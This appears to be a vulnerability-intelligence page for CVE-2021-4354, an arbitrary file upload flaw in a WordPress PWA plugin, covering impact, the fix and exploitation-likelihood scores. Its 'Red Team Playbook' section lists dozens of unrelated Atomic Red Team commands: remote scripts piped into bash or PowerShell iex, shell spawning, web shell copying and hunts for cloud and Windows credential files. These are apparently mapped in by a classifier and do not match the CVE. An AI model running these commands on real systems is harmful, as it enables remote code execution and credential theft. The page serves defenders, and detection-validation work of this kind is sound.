CVE-2021-4354
Overview
This vulnerability is an arbitrary file upload flaw caused by insufficient validation of uploaded file types within the pwaforwp_splashscreen_uploader function of the PWA for WP & AMP for WordPress plugin. The affected component is the splash screen uploader module, which fails to enforce restrictions on file extensions or content, allowing unauthorized file types to be accepted. This issue exists in versions up to and including 1.7.32 of the plugin.
Vulnerability Description
The PWA for WP & AMP for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the pwaforwp_splashscreen_uploader function in versions up to, and including, 1.7.32. This makes it possible for authenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible.
Impact
An authenticated attacker with upload permissions can exploit this vulnerability to upload malicious files to the web server, potentially resulting in remote code execution. This can lead to full site compromise, data exposure, and unauthorized control over the hosting environment. The attack requires low privileges (authenticated user) and no user interaction beyond login, as indicated by the CVSS vector (PR:L/UI:N). This elevates risk for sites using the affected plugin versions in WordPress environments.
Solution
Users should upgrade the PWA for WP & AMP for WordPress plugin to version 1.7.33 or later, where the file upload validation issue has been addressed. Detailed patch information and remediation guidance are available in the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/6082791e-feac-41f7-b565-9d98624ddf50 and the Nintechnet blog post. No official workaround is documented; prompt updating is recommended to mitigate exploitation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the PWA for WP & AMP plugin arises from inadequate validation of file types during the upload process, specifically in the function responsible for handling splash screen uploads. This oversight allows authenticated users to bypass security measures and upload arbitrary files to the server. The lack of stringent checks means that an attacker could potentially upload malicious scripts disguised as legitimate files, leading to severe consequences such as remote code execution. This flaw is particularly concerning given that it affects versions up to and including 1.7.32, leaving numerous installations vulnerable to exploitation.
Attack vectors for this vulnerability are primarily centered around authenticated users, which could include legitimate users with compromised accounts or malicious insiders. Once an attacker gains access to the system, they can exploit the file upload functionality to introduce harmful payloads. For instance, an attacker might upload a web shell or other executable files that could be triggered remotely, allowing them to execute arbitrary commands on the server. The implications of this are significant, as it could lead to unauthorized access to sensitive data, manipulation of website content, or even complete server takeover, depending on the privileges of the compromised account.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely on WordPress for their web presence. A successful exploitation could result in data breaches, loss of customer trust, and potential legal ramifications, especially if sensitive information is compromised. Additionally, the financial repercussions of remediation efforts, downtime, and potential loss of business can be substantial. Organizations may also face reputational damage, which can have long-lasting effects on customer relationships and brand integrity.
To detect and mitigate this vulnerability, organizations should implement several strategies. First, it is crucial to ensure that all plugins, including the PWA for WP & AMP, are kept up to date with the latest security patches. Regularly auditing user accounts and permissions can help minimize the risk of unauthorized access. Furthermore, employing a web application firewall (WAF) can provide an additional layer of security by filtering out potentially malicious file uploads. Implementing strict file type validation and content scanning on the server side can also help prevent the upload of harmful files. Organizations should conduct regular security assessments and penetration testing to identify and address vulnerabilities proactively.
In conclusion, the vulnerability in the PWA for WP & AMP plugin highlights the critical importance of robust file validation mechanisms in web applications. The potential for exploitation underscores the need for organizations to adopt comprehensive security practices, including regular updates, user access management, and proactive detection measures. By addressing these vulnerabilities and implementing effective mitigation strategies, organizations can significantly reduce their risk exposure and protect their digital assets from malicious actors.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-4354, reflecting a significant rise in the likelihood of exploitation attempts. The EPSS score has surged by over 60%, placing this vulnerability near the top percentile for predicted exploitation risk. Although no new exploit techniques or proof-of-concept code have been publicly disclosed, this upward trend in EPSS suggests growing interest or preparatory activity among threat actors, potentially increasing the window of opportunity for successful attacks. For defenders, this escalation signals an elevated threat environment where the vulnerability’s exploitation potential is becoming more imminent, warranting heightened vigilance in monitoring and detection efforts. Consequently, the risk assessment for CVE-2021-4354 should be adjusted to reflect an increased probability of exploitation, emphasizing the need for timely response despite the absence of confirmed active exploitation campaigns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Magazine3 | Pwa For Wp \& Amp | All |
cpe:2.3:a:magazine3:pwa_for_wp_\&_amp:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-1 | Accessing Functionality Not Properly Constrained by ACLs |
35%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-4354 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/6082791e-feac-41f7-b565-9d98624ddf50?source=cve |
| blog.nintechnet.com |
GitHub CVE
|
https://blog.nintechnet.com/wordpress-pwa-for-wp-and-amp-plugin-fixed-vulnerabilities/ |